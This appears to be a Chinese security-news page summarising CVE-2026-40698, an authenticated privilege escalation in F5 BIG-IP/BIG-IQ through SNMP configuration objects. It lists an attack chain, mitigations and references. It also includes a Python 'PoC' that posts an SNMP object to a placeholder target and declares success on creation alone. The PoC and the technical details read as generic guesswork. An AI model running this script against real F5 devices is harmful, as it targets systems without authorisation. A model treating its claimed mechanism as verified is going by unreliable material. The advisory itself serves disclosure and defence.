CVE-2026-40698 CVSS 8.7 高危

CVE-2026-40698 F5 BIG-IP/BIG-IQ权限提升漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40698

漏洞类型

权限提升

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP, F5 BIG-IQ

漏洞概述

F5 BIG-IP和BIG-IQ系统中发现一处高危权限提升漏洞。具有至少Resource Administrator角色的高权限认证攻击者，能够利用iControl REST接口或tmsh命令行工具创建SNMP配置对象。由于系统在处理该操作时存在权限校验缺陷，攻击者可借此获得超出预期的系统控制权。该漏洞无需用户交互即可通过网络被利用，对系统的机密性和完整性构成严重威胁。请注意，已达到技术支持终止（EoTS）的软件版本不在评估范围之内。

技术细节

该漏洞的核心在于F5 BIG-IP及BIG-IQ系统在处理特定SNMP配置对象创建请求时的访问控制机制失效。攻击者首先需要获取系统上的Resource Administrator或更高级别的合法凭证，这是利用该漏洞的前提条件。在获得认证后，攻击者可以通过iControl REST API向系统发送恶意的SNMP配置创建请求，或者在tmsh中执行相应的配置命令。由于系统未对此类配置操作所隐含的权限范围进行严格隔离与验证，导致攻击者能够通过创建特定的配置对象（如修改SNMP community strings或trap设置），间接提升其在系统中的操作权限。这种权限提升可能允许攻击者绕过某些管理边界，读取敏感配置数据或修改关键系统设置，从而完全控制受影响的设备。此漏洞利用路径清晰，且攻击过程无需目标用户交互，具有较高的可利用性。

攻击链分析

STEP 1

步骤1

攻击者获取拥有Resource Administrator或更高权限的F5系统合法凭证。

STEP 2

步骤2

攻击者通过iControl REST接口或tmsh访问SNMP配置模块。

STEP 3

步骤3

发送特制请求以创建SNMP配置对象，绕过部分权限检查。

STEP 4

步骤4

系统处理请求，导致攻击者获得提升后的系统权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target F5 BIG-IP/iControl REST endpoint
target_url = "https://<TARGET_IP>/mgmt/tm/sys/snmp/"
auth = ("<RESOURCE_ADMIN_USER>", "<PASSWORD>")

headers = {
    "Content-Type": "application/json",
}

# Payload to create a malicious SNMP configuration object
# Exploiting the lack of strict privilege checks on object creation
payload = {
    "name": "exploit_config",
    "allowedAddresses": ["0.0.0.0/0"], # Example configuration
    # Additional fields might be required based on specific API version
}

try:
    # Send POST request to create object
    response = requests.post(target_url, data=json.dumps(payload), headers=headers, auth=auth, verify=False)
    
    if response.status_code == 200 or response.status_code == 201:
        print("[+] Exploit successful! SNMP object created.")
        print("[+] Response: " + response.text)
    else:
        print("[-] Exploit failed. Status code: " + str(response.status_code))

except Exception as e:
    print("[-] An error occurred: " + str(e))

影响范围

F5 BIG-IP (具体受影响版本请参考官方公告K000160981)

F5 BIG-IQ (具体受影响版本请参考官方公告K000160981)

防御指南

临时缓解措施

如果无法立即升级，建议临时禁用SNMP服务（前提是业务允许），并通过网络策略严格限制对管理接口（iControl REST及SSH）的访问来源，仅允许可信IP地址连接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-40698
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-40698
3 Details https://www.cvedetails.com/cve/CVE-2026-40698/
4 VulDB https://vuldb.com/cve/CVE-2026-40698
5 Link https://my.f5.com/manage/s/article/K000160981

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表